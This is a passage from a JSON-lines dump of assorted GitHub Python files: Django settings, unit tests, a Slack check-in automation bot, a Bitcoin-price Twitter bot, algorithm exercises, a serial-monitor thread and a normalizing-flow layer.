bot.run(...)","repo_name":"MiroslavRosenov/better-cluster","sub_path":"examples/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"28584664495","text":"from pathlib import Path\n\nimport dj_database_url\n\n# Base directory\nBASE_DIR = Path(__file__).resolve().parent.parent.parent\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.sqlite3',\n        'NAME': BASE_DIR / 'db.sqlite3',\n    }\n}\n\n# set up for heroku's db\ndb_from_env = dj_database_url.config()\n\nDATABASES['default'].update(db_from_env)\n\nDATABASES['default']['CONN_MAX_AGE'] = 500\n\n# hosts urls\nALLOWED_HOSTS = [\n    'vitalcen.herokuapp.com',\n    '.vitalcen.com',\n]\n\n# EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD')\nCORS_REPLACE_HTTPS_REFERER = True\nHOST_SCHEME = \"https://\"\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\nSECURE_SSL_REDIRECT = True\nSESSION_COOKIE_SECURE = True\nCSRF_COOKIE_SECURE = True\nSECURE_HSTS_INCLUDE_SUBDOMAINS = True\nSECURE_HSTS_SECONDS = 1000000\nSECURE_FRAME_DENY = True\nSECURE_HSTS_PRELOAD = True\n","repo_name":"macodd/vitalcen","sub_path":"vitalcen/config/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24893411521","text":"import pytest\nfrom src.Ejercicio_2_1_7 import tipo_de_renta\n\n@pytest.mark.parametrize(\n    \"input_n, expected\",\n    [\n        (9000, \"5\"),\n        (12000, \"15\"),\n        (22000, \"20\"),\n        (36000, \"30\"),\n        (70545, \"45\"),\n        (37000, \"30\")\n    ]\n)\ndef test_tipo_de_renta_params(input_n, expected):\n    assert tipo_de_renta(input_n) == expected","repo_name":"IES-Rafael-Alberti/1dawb-ejercicios-u2-dbenfon341","sub_path":"tests/Ejercicio_2_1_7_test.py","file_name":"Ejercicio_2_1_7_test.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71564872106","text":"import sys\nimport webbrowser\nfrom time import sleep\n\ndef start():\n    with open(sys.argv[1], \"r\") as f:\n        while True:\n            line = f.readline()\n            if line:\n                webbrowser.open(line.strip(), new=0, autoraise=True)\n                sleep(5)\n            else:\n                # readline() returns '' at EOF; stop instead of spinning forever\n                break\nstart()\n","repo_name":"dineyw23/OpenWebPages","sub_path":"pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70887962668","text":"from config import (\n    CHECKIN_TIME,\n    SLACK_EMAIL,\n    SLACK_PASSWORD,\n    COACH,\n    GECKODRIVER,\n)\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.chrome.options import Options as options_c\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium import webdriver\nfrom time import sleep\nfrom os import system, path\nimport datetime\n\nCLEAR = lambda: system(\"clear\")\nPATH = path.realpath(__file__)\nPATH = PATH.replace(\"core/slack_bot.py\", f\"chrome_driver/{GECKODRIVER}\")\nPATH = PATH.replace(\"core\\slack_bot.py\", f\"chrome_driver\\{GECKODRIVER}\")\n\n\nclass Bot:\n    def __init__(self):\n        # CHROME DRIVER OPTIONS\n        chrome_options = options_c()\n        chrome_options.add_argument(\"--disable-extensions\")\n        chrome_options.add_argument(\"--disable-gpu\")\n        chrome_options.add_argument(\"--headless\")\n        chrome_options.add_experimental_option(\"excludeSwitches\", [\"enable-logging\"])\n        self.driver = webdriver.Chrome(PATH, options=chrome_options)\n\n    def write_checkin(self, text1, text2):\n        input_to_write = self.driver.find_elements_by_class_name(\"ql-editor, ql-blank\")\n\n        input_to_write.reverse()\n\n        if text1 != \"\":\n            
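# builds the reply as a numbered status line plus a blockers line, e.g.\n            # text1=\"finish report\", text2=\"none\" yields \"1. Finish report\" / \"None\" (illustrative)\n            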
what_im_doing = f\"1. {text1.capitalize()}\"\n            problems = text2.capitalize()\n            input_to_write[0].send_keys(what_im_doing + Keys.CONTROL + Keys.ENTER)\n            input_to_write[0].send_keys(problems)\n            input_to_write[0].send_keys(Keys.ENTER)\n\n        if text1 == \"\":\n            input_to_write[0].send_keys(\"Check-in\")\n            input_to_write[0].send_keys(Keys.ENTER)\n\n        CLEAR()\n\n    def login_slack(self, link):\n\n        self.driver.get(link)\n\n        sleep(2)\n\n        workspace_link = self.driver.find_element_by_xpath('//*[@id=\"domain\"]')\n\n        workspace_link.send_keys(\"kenzieacademybrasil\")\n\n        workspace_button = self.driver.find_element_by_xpath(\n            \"/html/body/main/div/div/div/div/div[2]/form/button\"\n        )\n        workspace_button.click()\n\n        sleep(2)\n\n        slack_email = self.driver.find_element_by_xpath('//*[@id=\"email\"]')\n        slack_email.send_keys(SLACK_EMAIL)\n        slack_password = self.driver.find_element_by_xpath('//*[@id=\"password\"]')\n        slack_password.send_keys(SLACK_PASSWORD)\n\n        login_button = self.driver.find_element_by_xpath('//*[@id=\"signin_btn\"]')\n        login_button.click()\n\n        sleep(2)\n\n    def find_thread(self, text1=\"\", text2=\"\"):\n        checkin_done = False\n\n        while not checkin_done:\n\n            slack_messages = self.driver.find_elements_by_css_selector(\n                \".c-message_kit__gutter\"\n            )\n\n            slack_checkin_to_send = [\n                message\n                for message in slack_messages\n                if \"Devs check-in\" in message.text or \"Coaches check-in\" in message.text\n            ]\n\n            slack_checkin_to_send.reverse()\n\n            if (\n                CHECKIN_TIME[\"MORNING\"][\"start\"][0:2].lstrip(\"0\")\n                in slack_checkin_to_send[0].text\n            ):\n                hover = ActionChains(self.driver).move_to_element(\n                    slack_checkin_to_send[0]\n                )\n                hover.perform()\n                thread_button = self.driver.find_element_by_xpath(\n                    \"/html/body/div[2]/div/div[2]/div[3]/div/div[2]/div[1]/div/div[2]/div/div[2]/div[1]/div/div/div[10]/div/div/div/div[3]/div/button[3]\"\n                )\n                thread_button.click()\n                sleep(2)\n                self.write_checkin(text1, text2)\n                sleep(1)\n\n                # silence thread notifications\n                hover = ActionChains(self.driver).move_to_element(\n                    slack_checkin_to_send[0]\n                )\n                hover.perform()\n                option_button = self.driver.find_element_by_css_selector(\n                    \".c-message_actions__button:last-child\"\n                )\n                option_button.click()\n                silence_button = self.driver.find_element_by_css_selector(\n                    \".c-menu__items > div:first-child\"\n                )\n                silence_button.click()\n                checkin_done = True\n\n            elif (\n                CHECKIN_TIME[\"EVENING\"][\"start\"][0:2].lstrip(\"0\")\n                in slack_checkin_to_send[0].text\n            ):\n                hover = ActionChains(self.driver).move_to_element(\n                    slack_checkin_to_send[0]\n                )\n                hover.perform()\n                thread_button = self.driver.find_element_by_css_selector(\n                    \".c-message_actions__button:nth-child(2)\"\n                )\n                thread_button.click()\n                sleep(2)\n                self.write_checkin(text1, text2)\n                sleep(1)\n\n                # silence thread notifications\n                hover = ActionChains(self.driver).move_to_element(\n                    slack_checkin_to_send[0]\n                )\n                hover.perform()\n                option_button = self.driver.find_element_by_css_selector(\n                    \".c-message_actions__button:last-child\"\n                )\n                option_button.click()\n                silence_button = self.driver.find_element_by_css_selector(\n                    \".c-menu__items > div:first-child\"\n                )\n                silence_button.click()\n                checkin_done = True\n\n            else:\n                CLEAR()\n                print(\"Check-in not found\\nTrying again in 20 seconds...\")\n                sleep(20)\n\n\n## /html/body/div[2]/div/div[2]/div[5]/div/div/div[2]/div/div[2]/div/div[2]/div[1]/div/div/div[9]/div/div[1]/div/div/div[1]/div/div[1]/p\n## /html/body/div[2]/div/div[2]/div[5]/div/div/div[2]/div/div[2]/div/div[2]/div[1]/div/div/div[12]/div/div[1]/div/div/div[1]/div/div[1]/p\n","repo_name":"christiansmmc/slack-checkin-bot","sub_path":"core/slack_bot.py","file_name":"slack_bot.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"20704070017","text":"# https://leetcode.com/problems/divide-two-integers/\n\nclass Solution:\n    def divide(self, dividend: int, divisor: int) -> int:\n        sign = 1\n        if (dividend < 0 and divisor > 0) or (dividend > 0 and divisor < 0): \n            sign = -1\n\n        divisor = abs(divisor)\n        dividend = abs(dividend)\n\n        # imagine dividend == 113 and divisor == 17\n        # call stack of dbl(17, 1):\n        # dbl(17, 1)\n        # dbl(34, 2)\n        # dbl(68, 4)\n        # return sum = 0 + 68 && count = 4\n        # return sum = 68 + 34 == 102 && count = 4 + 2 == 6\n        # since 102 + 17 > 113 sum remains 102\n        # return count == 6 as result which means floor(113 / 17) == 6\n        \n        def dbl(num, cnt):\n            if num > dividend:\n                return 0, 0\n            \n            s, c = dbl(num + num, cnt + cnt)\n            \n            if s + num <= dividend:\n                s += num\n                c += cnt\n            \n            return s, c\n\n        # do the work\n        _, res = dbl(divisor, 1)\n        \n        # fix sign\n        res = res if sign == 1 else -res\n        \n        # clamp result to the signed 32-bit range [-2**31, 2**31 - 1]\n        # (note: 1 << 31 - 1 would parse as 1 << 30, so the parentheses matter)\n        mx = (1 << 31) - 1\n        mn = -(1 << 31)\n        \n        if res > mx: \n            return mx\n        \n        if res < mn: \n            return mn\n        \n        return res\n
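# sanity checks (illustrative):\n#   divide(113, 17)    -> 6\n#   divide(7, -3)      -> -2   (truncates toward zero)\n#   divide(-2**31, -1) -> 2**31 - 1 (clamped)\n    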
","repo_name":"dnsvee/Solutions_to_LeetCode_Problems","sub_path":"LeetCode_29_Divide_Two_Integers.py","file_name":"LeetCode_29_Divide_Two_Integers.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3548850731","text":"import threading\r\nimport time\r\nimport util\r\nfrom filter.manager import FilterManager\r\nimport logger\r\n\r\nlog = logger.get()\r\n\r\n\r\nclass _WriteFileArgs(object):\r\n    def __init__(self, view, regions):\r\n        self.view = view\r\n        self.regions = regions\r\n\r\n\r\nclass ViewWriter(object):\r\n    def __init__(self, view):\r\n        self._view_lock = threading.Lock()\r\n        self._newline = True\r\n        self.view = view\r\n\r\n    def set_view(self, view):\r\n        with self._view_lock:\r\n            self.view = view\r\n            self._newline = True\r\n\r\n    def write(self, text, timestamp=\"\"):\r\n        if not self.view.is_valid():\r\n            return\r\n        # If timestamps are enabled, append a timestamp to the start of each line\r\n        if timestamp:\r\n            # Newline was stripped from the end of the last write, needs to be\r\n            # added to the beginning of this write\r\n            if self._newline:\r\n                text = timestamp + text\r\n                self._newline = False\r\n            # Count the number of newlines in the text to add a timestamp to\r\n            # if the text ends with a newline, do not add a timestamp to the next\r\n            # line and instead add it with the next text received\r\n            newlines = text.count(\"\\n\")\r\n            if text[-1] == '\\n':\r\n                newlines -= 1\r\n                self._newline = True\r\n            text = text.replace(\"\\n\", \"\\n%s\" % timestamp, newlines)\r\n\r\n        with self._view_lock:\r\n            util.main_thread(self.view.run_command, \"serial_monitor_write\", {\"text\": text})\r\n\r\n\r\nclass SerialMonitor(threading.Thread):\r\n    \"\"\"\r\n    Thread that controls a stream's read, write, open, close, etc. 
and outputs the serial info to a sublime view\r\n :type stream: stream.AbstractStream\r\n \"\"\"\r\n def __init__(self, stream, view, window):\r\n super(SerialMonitor, self).__init__(name=\"Thread-{}\".format(stream.name))\r\n self.stream = stream\r\n self.view = view\r\n self.window = window\r\n self.lock = threading.Lock()\r\n self.running = False\r\n self.timestamp_logging = False\r\n self.line_endings = \"CRLF\"\r\n self.local_echo = False\r\n self._text_to_write = []\r\n self._file_to_write = []\r\n self._text_lock = threading.Lock()\r\n self._file_lock = threading.Lock()\r\n self._filter_manager = FilterManager()\r\n self._newline = True\r\n self._view_writer = ViewWriter(view)\r\n\r\n self._new_configuration = None\r\n\r\n def write_line(self, text):\r\n with self._text_lock:\r\n self._text_to_write.append(text)\r\n\r\n def write_file(self, view, selection):\r\n file_args = _WriteFileArgs(view, selection)\r\n with self._file_lock:\r\n self._file_to_write.append(file_args)\r\n\r\n def disconnect(self):\r\n self.running = False\r\n\r\n def enable_timestamps(self, enabled):\r\n self.timestamp_logging = enabled\r\n\r\n def set_output_view(self, view):\r\n self._view_writer.set_view(view)\r\n\r\n def set_line_endings(self, line_endings):\r\n if line_endings.upper() in [\"CR\", \"LF\", \"CRLF\"]:\r\n self.line_endings = line_endings.upper()\r\n return True\r\n print(\"Unknown line ending: %s\" % line_endings)\r\n return False\r\n\r\n def set_local_echo(self, enabled):\r\n self.local_echo = enabled\r\n\r\n def add_filter(self, filtering_file, output_view):\r\n self._filter_manager.add_filter(filtering_file, output_view)\r\n\r\n def remove_filter(self, filtering_file):\r\n self._filter_manager.remove_filter(filtering_file)\r\n\r\n def filters(self):\r\n return self._filter_manager.filters()\r\n\r\n def get_config(self):\r\n \"\"\"\r\n :rtype: stream.SerialConfig\r\n \"\"\"\r\n return self.stream.config\r\n\r\n def reconfigure_port(self, config):\r\n self._new_configuration = config\r\n\r\n def _write_to_output(self, text):\r\n if not text:\r\n return\r\n text = util.serial_line_endings_to_sublime(text, self.line_endings)\r\n\r\n timestamp = \"\"\r\n if self.timestamp_logging:\r\n t = time.time()\r\n timestamp = time.strftime(\"[%m-%d-%y %H:%M:%S.\", time.localtime(t)) + \"%03d] \" % (int(t * 1000) % 1000)\r\n\r\n filter_thread = threading.Thread(target=self._filter_manager.apply_filters, args=(text, timestamp))\r\n filter_thread.start()\r\n self._view_writer.write(text, timestamp)\r\n\r\n def _read_stream(self):\r\n serial_input = self.stream.read(1024)\r\n if serial_input:\r\n self._write_to_output(serial_input.decode(encoding=\"ascii\", errors=\"replace\"))\r\n\r\n def _write_text(self):\r\n with self._text_lock:\r\n text_list = self._text_to_write[:]\r\n self._text_to_write = []\r\n\r\n # Write any text in the queue to the serial port\r\n while text_list:\r\n text = text_list.pop(0)\r\n\r\n if self.local_echo:\r\n self._write_to_output(text)\r\n\r\n text = util.sublime_line_endings_to_serial(text, self.line_endings)\r\n self.stream.write(bytes(text, encoding=\"ascii\"))\r\n self._read_stream()\r\n\r\n def _write_file(self):\r\n with self._file_lock:\r\n # Write any files in the queue to the serial port\r\n while self._file_to_write:\r\n output_file = self._file_to_write.pop(0)\r\n for region in output_file.regions:\r\n text = output_file.view.substr(region)\r\n lines = text.splitlines(True)\r\n if not lines[-1].endswith(\"\\n\"):\r\n lines[-1] += \"\\n\"\r\n for line in lines:\r\n if 
self.local_echo:\r\n self._write_to_output(line)\r\n\r\n line = util.sublime_line_endings_to_serial(line, self.line_endings)\r\n self.stream.write(bytes(line, encoding=\"ascii\"))\r\n self._read_stream()\r\n\r\n def run(self):\r\n self.running = True\r\n try:\r\n self.stream.open()\r\n while self.running and self.view.is_valid():\r\n self._read_stream()\r\n self._write_text()\r\n self._write_file()\r\n\r\n if self._new_configuration:\r\n self.stream.reconfigure(self._new_configuration)\r\n self._new_configuration = None\r\n except Exception as e:\r\n self._write_to_output(\"\\nError occurred on port {0}: {1}\".format(self.stream.comport, str(e)))\r\n log.exception(e)\r\n finally:\r\n log.info(\"Disconnecting from {}\".format(self.stream.comport))\r\n # Thread terminated, write to buffer if still valid and close the serial port\r\n self._write_to_output(\"\\nDisconnected from {0}\".format(self.stream.comport))\r\n self._filter_manager.port_closed(self.stream.comport)\r\n self.stream.close()\r\n self.running = False\r\n util.main_thread(self.window.run_command, \"serial_monitor\", {\"serial_command\": \"_port_closed\",\r\n \"comport\": self.stream.comport})\r\n","repo_name":"ThomasGerstenberg/serial_monitor","sub_path":"serial_monitor_thread.py","file_name":"serial_monitor_thread.py","file_ext":"py","file_size_in_byte":7228,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"36783335198","text":"import pandas as pd\n\nin_filename = \"raw_data/covid_cnty_cases_all_methods.csv\"\nout_filename = \"task2_data/top_10_pop_all_step_ahead.csv\"\n\nconfig_filename = \"task2_data/top_10_pop_fips.txt\"\ncounties = open(config_filename, \"r\").read().split(\",\")\nstep_ahead = [\"1-step_ahead\", \"2-step_ahead\", \"3-step_ahead\", \"4-step_ahead\"]\n\nfilter_str = \"cnty in @counties and step_ahead in @step_ahead\"\n\n########################################################################\n\nprint(\"counties:\", counties)\nprint(\"step ahead:\", step_ahead)\n\nraw_df = pd.read_csv(in_filename, dtype={\"cnty\": \"str\"})\nprint(\"Total rows:\", len(raw_df))\n\nfinal_df = raw_df.query(filter_str)\\\n .drop_duplicates()\\\n .drop('fct_std', axis=1)\\\n .sort_values(by=['cnty', 'method', 'horizon', 'step_ahead'])\n\nprint(final_df)\n\nwith open(out_filename, \"w\", newline='') as out_file:\n final_df.to_csv(path_or_buf=out_file, sep=\",\", index=False)","repo_name":"adham-ibrahim7/Biocomplexity-Institute-Internship-2223","sub_path":"filter_raw_data_pd.py","file_name":"filter_raw_data_pd.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14694712235","text":"\"\"\"\nThis problem was asked by Microsoft.\nGiven a string and a pattern, find the starting indices of all occurrences of the pattern in the string. 
For example, given the string \"abracadabra\" and the pattern \"abr\", you should return [0, 7].\n\"\"\"\n\n\ndef findOccurenceIdx(string, pattern):\n occurences = []\n\n for i in range(len(string) - len(pattern) + 1):\n\n if string[i] == pattern[0]:\n\n windowStr = ''\n for j in range(i, i+len(pattern)):\n windowStr += string[j]\n\n if windowStr == pattern:\n occurences.append(i)\n\n return occurences\n\n\nprint(\"Occurences at: {}\".format(findOccurenceIdx('abracadabra', 'abr')))\n","repo_name":"troywsmith/pygo","sub_path":"practice/DCP/211.py","file_name":"211.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70576283307","text":"from typing import List\n\n\nclass Solution:\n def findLongestChain(self, pairs: List[List[int]]) -> int:\n pairs.sort(key=lambda x: (x[1], x[0]))\n\n prev = pairs[0]\n res = 1\n\n for curr in pairs[1:]:\n if curr[0] > prev[1]:\n res += 1\n prev = curr\n\n return res\n","repo_name":"lymchgmk/Algorithm-Problem-Solving","sub_path":"LeetCode/Python/646. Maximum Length of Pair Chain /Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72829616427","text":"import re\nfrom embedding_method.mapper import MemFetcher\nimport numpy as np\n\nclass QueryToLaser:\n def __init__(self,base_path,embedder,max_length):\n self.base_path = base_path\n self.max_length = max_length\n self.embedder = embedder\n self.embedding_method = \"laser\"\n self.wordmmap = MemFetcher(self.base_path + self.embedding_method + \"/word2emb.json\",self.base_path + self.embedding_method + \"/word_emb.jsonl\")\n\n def get_embedding(self, query):\n query_text = query[\"context\"]\n q_emb = []\n query_text = self.clean(query_text)\n for word in query_text.split(\" \"):\n if word != '':\n try:\n emb = self.wordmmap(word)\n\n q_emb.append(emb)\n except:\n # print(\"ofv: \",word)\n emb = self.embedder(word)[0]\n q_emb.append(emb)\n\n assert emb.shape == (1024,), \"got: {}\".format(emb.shape)\n\n return q_emb,query_text\n\n\n def clean(self,text):\n text = re.sub(\"[/$&+,:;=?@#|'<>.\\\"^*()%!-]\", ' ', text)\n #text = text.lower()\n return text\n\n def padding(self,query,max_len):\n while len(query) < max_len:\n query.append(np.zeros(1024))\n\n return query[:self.max_length]","repo_name":"Lyngsoe/AutomaticQueryReformulation","sub_path":"legacy/query_to_laser.py","file_name":"query_to_laser.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41272625087","text":"import argparse\nimport pytest\nimport collections\n\n\ndef find_combinations(index, value, combinations, data):\n\n for idx, num in enumerate(data[:index]):\n\n if value - num <= 3:\n combinations[value] += combinations[num]\n\n if value not in combinations:\n combinations[value] = 1\n\n\ndef compute(data):\n\n data_i = sorted([int(i) for i in data.splitlines()])\n data_i.insert(0, 0)\n combinations = collections.defaultdict(int, {0: 1})\n\n for idx, num in enumerate(data_i):\n\n find_combinations(idx, num, combinations, data_i)\n\n return combinations[data_i[-1]]\n\n\nINPUT = \"\"\"\\\n16\n10\n15\n5\n1\n11\n7\n19\n6\n12\n4\n\"\"\"\n\nINPUT_2 = \"\"\"\\\n28\n33\n18\n42\n31\n14\n46\n20\n48\n47\n24\n23\n49\n45\n19\n38\n39\n11\n1\n32\n25\n35\n8\n17\n7\n9\n4\n2\n34\n10\n3\n\"\"\"\n\n\n@pytest.mark.parametrize(\n 
(\"test_input,expected\"), [(INPUT, 8), (INPUT_2, 19208)]\n) # noqa: E501\ndef test(test_input, expected):\n assert compute(test_input) == expected\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"file\")\n args = parser.parse_args()\n\n with open(args.file, \"r\") as f:\n print(compute(f.read()))\n\n\nif __name__ == \"__main__\":\n exit(main())\n","repo_name":"Steven-N/adventofcode2020","sub_path":"day10/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44226963477","text":"import datetime\n\nimport pytest\nfrom eth_utils import to_wei\nfrom web3.contract import Contract\n\n\n@pytest.fixture\ndef presale_freeze_ends_at() -> int:\n \"\"\"How long presale funds stay frozen until refund.\"\"\"\n return int(datetime.datetime(2017, 1, 1).timestamp())\n\n\n@pytest.fixture\ndef presale_fund_collector(chain, presale_freeze_ends_at, team_multisig) -> Contract:\n \"\"\"In actual ICO, the price is doubled (for testing purposes).\"\"\"\n args = [\n team_multisig,\n presale_freeze_ends_at,\n to_wei(1, \"ether\")\n ]\n tx = {\n \"from\": team_multisig,\n }\n presale_fund_collector, hash = chain.provider.deploy_contract('PresaleFundCollector', deploy_args=args, deploy_transaction=tx)\n return presale_fund_collector\n\n\n@pytest.fixture\ndef presale_crowdsale(chain, presale_fund_collector, uncapped_flatprice, team_multisig):\n \"\"\"ICO associated with the presale where funds will be moved to a presale.\"\"\"\n presale_fund_collector.transact({\"from\": team_multisig}).setCrowdsale(uncapped_flatprice.address)\n return uncapped_flatprice\n","repo_name":"mysteriumnetwork/contracts","sub_path":"tests/fixtures/presale.py","file_name":"presale.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"9289910502","text":"import requests\nimport csv\nimport os\nfrom datetime import datetime\nfrom collections import defaultdict\nimport json\nimport tqdm\n\n\n\n\ndef make_json():\n by_ltla = defaultdict(list)\n by_lineage = defaultdict(list)\n with open(\"10_lineage.csv\", \"r\") as csvfile:\n dataset = []\n reader = csv.reader(csvfile, delimiter=\",\")\n next(reader)\n for i, row in tqdm.tqdm(enumerate(reader)):\n j, lad, date, mean, upper, lower, param, lineage = row\n\n if mean !=\"\":\n mean = round(float(mean),3)\n upper = round(float(upper),3)\n lower = round(float(lower),3)\n\n item = {\n 'date':date,\n 'parameter': param,\n 'location': lad,\n 'mean': mean,\n 'upper': upper,\n 'lower': lower,\n 'lineage' : lineage\n }\n by_ltla[lad].append(item)\n by_lineage[lineage].append(item)\n for k,v in tqdm.tqdm(by_ltla.items()):\n with open(f'../public/data/ltla/{k}.json', 'w') as outfile:\n json.dump({'data':v}, outfile)\n for k,v in tqdm.tqdm(by_lineage.items()):\n with open(f'../public/data/lineage/{k}.json', 'w') as outfile:\n json.dump({'data':v}, outfile)\n with open(f'../src/assets/lists.json', 'w') as outfile:\n json.dump({'ltlas':list(by_ltla.keys()),'lineages':list(by_lineage.keys() )}, outfile)\n \n\n\n\n# new\nif __name__ == \"__main__\":\n make_json()\n\n","repo_name":"hawkingbeck/covince","sub_path":"populate/make_json.py","file_name":"make_json.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"24135754132","text":"# for循环的优化策略:\n# 1 
\nimport time\n\ns1 = time.time()\nfor i in range(1000):\n    list1 = []\n    for j in range(10000):\n        list1.append(i*5 + j*10)\ne1 = time.time()\nprint(\"Method 1 took: {0} s\".format(e1-s1))\n\ns2 = time.time()\nfor i in range(1000):\n    list2 = []\n    c = i * 5\n    for j in range(10000):\n        list2.append(c + j*10)\ne2 = time.time()\nprint(\"Method 2 took: {0} s\".format(e2-s2))","repo_name":"taomee517/python-basic","sub_path":"basic/control_statement/for_improve.py","file_name":"for_improve.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75148821866","text":"import tweepy\nimport requests\nimport json \nimport time\nimport config\n\nauth_handler = tweepy.OAuthHandler(consumer_key=config.API_KEY,consumer_secret=config.API_SECRET)\nauth_handler.set_access_token(config.ACCESS_TOKEN, config.ACCESS_SECRET)\n\napi = tweepy.API(auth_handler, wait_on_rate_limit=True)\n\nprint('Logged in ')\n\nwhile True:\n    bitcoinprice = requests.get('https://api.coingecko.com/api/v3/simple/price?ids=bitcoin&vs_currencies=usd')\n    price = bitcoinprice.json()\n    btcusd = price['bitcoin']['usd']\n    print(btcusd)\n\n    message = 'The current BTC Price is : ' + str(btcusd) + ' USD, Buy #Bitcoin now'\n    api.update_status(message)\n    print('Tweet was posted successfully')\n    time.sleep(300)\n\n","repo_name":"Gobindapaull/Python-Concepts-and-Fundamentals","sub_path":"twitter-crypto-price.py","file_name":"twitter-crypto-price.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10297926225","text":"'''\nIterables and Iterators\nLink: https://www.hackerrank.com/challenges/iterables-and-iterators/problem\n'''\n\n# Enter your code here. Read input from STDIN. 
Print output to STDOUT\n\nfrom itertools import combinations\n\nn = int(input().rstrip())\nletters = input().rstrip().split()\nk = int(input().rstrip())\n\nletter_to_find = \"a\"\ncount = 0\n\nall_combinations = list(combinations(\"\".join(letters), k))\nfor combination in all_combinations:\n if letter_to_find in combination: count += 1\n\nprint(round(count/len(all_combinations), 3))","repo_name":"ashababnoor/hackerrank-solutions","sub_path":"python/itertools/iterables_and_iterators.py","file_name":"iterables_and_iterators.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11554602612","text":"from .db import db\nfrom sqlalchemy import DateTime\nimport datetime\n\nclass Image(db.Model):\n __tablename__ = 'images'\n\n id = db.Column(db.Integer, primary_key=True)\n url = db.Column(db.String(500), nullable=False)\n created_at = db.Column(DateTime, default=datetime.datetime.utcnow)\n updated_at = db.Column(DateTime, default=datetime.datetime.utcnow)\n \n spotId = db.Column(db.Integer, db.ForeignKey('spots.id'))\n spots = db.relationship(\"Spot\", back_populates=\"images\")\n\n def to_dict(self):\n return {\n \"id\": self.id,\n \"spotId\": self.spotId,\n \"url\": self.url,\n # \"comments\": [comment.to_dict() for comment in self.comments],\n }","repo_name":"Rayn89/scare-bnb","sub_path":"app/models/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19125666946","text":"from torch import nn\nimport torch\nimport numpy as np\nfrom normflowpy.base_flow import UnconditionalBaseFlowLayer\n\n\nclass BatchNorm(UnconditionalBaseFlowLayer):\n def __init__(self, num_features, momentum=0.1, eps=1.0e-5, affine=True):\n super(BatchNorm, self).__init__()\n\n self.num_features = num_features\n self.eps = eps\n self.momentum = momentum\n\n self.dimensions = [num_features]\n # self.dimensions[1] = num_features[0]\n log_gamma = torch.zeros(self.dimensions)\n beta = torch.zeros(self.dimensions)\n if affine:\n self.register_parameter('log_gamma', nn.Parameter(log_gamma))\n self.register_parameter('beta', nn.Parameter(beta))\n else:\n self.register_buffer('log_gamma', log_gamma)\n self.register_buffer('beta', beta)\n\n self.register_buffer('running_mean', torch.zeros(self.dimensions))\n self.register_buffer('running_var', torch.ones(self.dimensions))\n self.register_buffer('batch_mean', torch.zeros(self.dimensions))\n self.register_buffer('batch_var', torch.ones(self.dimensions))\n\n def forward(self, x):\n if self.training:\n x_reshape = x.view(x.size(0), self.num_features)\n x_mean = torch.mean(x_reshape, dim=[0], keepdim=True)\n x_var = torch.mean((x_reshape - x_mean).pow(2), dim=[0], keepdim=True) + self.eps\n self.batch_mean.data.copy_(x_mean.view(self.dimensions))\n self.batch_var.data.copy_(x_var.view(self.dimensions))\n\n self.running_mean.mul_(1.0 - self.momentum)\n self.running_var.mul_(1.0 - self.momentum)\n self.running_mean.add_(self.batch_mean.detach() * self.momentum)\n self.running_var.add_(self.batch_var.detach() * self.momentum)\n\n mean, var = self.batch_mean, self.batch_var\n else:\n mean, var = self.running_mean, self.running_var\n\n x = (x - mean) / torch.sqrt(var)\n x = x * torch.exp(self.log_gamma) + self.beta\n\n num_pixels = np.prod(x.size()) // (x.size(0) * x.size(1))\n log_det = self.log_gamma - 0.5 * torch.log(var)\n log_det_jacob = torch.sum(log_det) * 
